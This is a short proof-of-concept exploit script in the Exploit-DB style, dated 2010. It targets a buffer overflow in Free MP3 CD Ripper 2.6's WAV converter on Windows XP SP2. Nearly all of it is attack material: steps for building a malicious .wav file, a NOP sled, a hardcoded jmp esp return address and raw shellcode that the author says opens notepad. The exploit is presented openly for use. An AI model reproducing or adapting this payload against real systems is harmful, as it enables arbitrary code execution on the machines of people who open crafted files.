# Exploit Title: Free MP3 CD Ripper 2.6 0 day # Date: 30/03/2010 # Author: Richard leahy # Reference: # http://www.exploit-db.com/exploits/11975 # Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html # Version: 2.6 # Tested on: Windows Xp Sp2
#to exploit this open up the application select file -> wav converter -> wav to mp3
#use your favourite programming language and print out the contents into a text file. save the text file as a .wav #then open up the wav file and boom.
#feel free to email me leahy_rich@hotmail.com
#code nop = "\x90"
#imagehlp jmp_esp = [0x76cafa32].pack('V')
#shellcode opens notepad shellcode = "\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" + "\x33\x5e\x83\xee\xfc\x31\x56\x13\x03\x9a\x69\x29\x02\xde" + "\x66\x24\xed\x1e\x77\x57\x67\xfb\x46\x45\x13\x88\xfb\x59" + "\x57\xdc\xf7\x12\x35\xf4\x8c\x57\x92\xfb\x25\xdd\xc4\x32" + "\xb5\xd3\xc8\x98\x75\x75\xb5\xe2\xa9\x55\x84\x2d\xbc\x94" + "\xc1\x53\x4f\xc4\x9a\x18\xe2\xf9\xaf\x5c\x3f\xfb\x7f\xeb" + "\x7f\x83\xfa\x2b\x0b\x39\x04\x7b\xa4\x36\x4e\x63\xce\x11" + "\x6f\x92\x03\x42\x53\xdd\x28\xb1\x27\xdc\xf8\x8b\xc8\xef" + "\xc4\x40\xf7\xc0\xc8\x99\x3f\xe6\x32\xec\x4b\x15\xce\xf7" + "\x8f\x64\x14\x7d\x12\xce\xdf\x25\xf6\xef\x0c\xb3\x7d\xe3" + "\xf9\xb7\xda\xe7\xfc\x14\x51\x13\x74\x9b\xb6\x92\xce\xb8" + "\x12\xff\x95\xa1\x03\xa5\x78\xdd\x54\x01\x24\x7b\x1e\xa3" + "\x31\xfd\x7d\xa9\xc4\x8f\xfb\x94\xc7\x8f\x03\xb6\xaf\xbe" + "\x88\x59\xb7\x3e\x5b\x1e\x47\x75\xc6\x36\xc0\xd0\x92\x0b" + "\x8d\xe2\x48\x4f\xa8\x60\x79\x2f\x4f\x78\x08\x2a\x0b\x3e" + "\xe0\x46\x04\xab\x06\xf5\x25\xfe\x69\x96\xad\x64\x06\x09" + "\x2a\x67\xec"
boom = "\x41" * 4112 + jmp_esp + nop * 10 + shellcode puts boom
|